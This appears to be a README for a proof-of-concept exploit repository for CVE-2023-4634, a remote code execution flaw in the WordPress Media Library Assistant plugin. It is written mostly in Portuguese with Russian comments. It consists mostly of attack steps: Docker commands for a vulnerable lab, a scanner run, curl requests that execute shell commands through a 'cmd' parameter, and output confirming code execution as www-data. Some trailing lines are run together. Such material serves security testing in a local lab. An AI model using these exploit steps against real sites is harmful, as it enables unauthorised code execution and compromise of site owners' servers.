
Prova de conceito do exploit para CVE-2023-4634, uma vulnerabilidade de execução remota de código no plugin WordPress Media Library Assistant. Inclui um ambiente vulnerável baseado em Docker e um scanner automatizado.
cd Stand
docker-compose up --build -d
sleep 60
curl -I http://localhost:8080
cd ../PoC/src
python3 scanner.py http://localhost:8080
# Тест команды id
curl "http://localhost:8080/rce_proof.php?cmd=id"
# Тест команды ping
curl "http://localhost:8080/rce_proof.php?cmd=ping+-c+2+127.0.0.1"
# Создание файла-доказательства
curl "http://localhost:8080/rce_proof.php?cmd=touch+/tmp/rce_proof"
[*] Scanning: http://localhost:8080
[+] WordPress is accessible
[+] Plugin found: v3.09
[+] Plugin is VULNERABLE!
[*] Testing RCE...
[+] id command executed
[+] ping command executed
[+] file_check command executed
[+] RCE CONFIRMED!
[+] Results saved to ../result.txt
{
"cve": "CVE-2023-4634",
"target": "http://localhost:8080",
"timestamp": "2025-12-21 13:49:19",
"vulnerable": true,
"findings": {
"wordpress": true,
"plugin_vulnerable": true,
"rce_id": true,
"rce_id_output": "uid=33(www-data) gid=33(www-data) groups=33(www-data)",
"rce_ping": true,
"rce_file_check": true
},
"plugin_version": "3.09",
"status": "VULNERABLE"
}
172.20.0.2:80 (acessível em localhost:8080)172.20.0.3:3306172.20.0.0/24id via HTTPping via HTTP/tmp/www-dataresult.txtcd Stand
docker-compose down -v